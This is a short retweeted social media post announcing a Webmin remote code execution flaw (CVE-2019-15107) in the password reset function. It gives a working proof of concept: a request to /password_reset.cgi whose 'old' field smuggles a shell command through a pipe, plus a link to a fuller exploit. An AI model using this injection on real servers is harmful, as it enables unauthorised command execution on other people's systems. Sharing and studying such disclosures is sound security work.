RT @shishi0_@twitter.com
"Webmin 0day remote code execution"
Tl;Dr: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan.
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html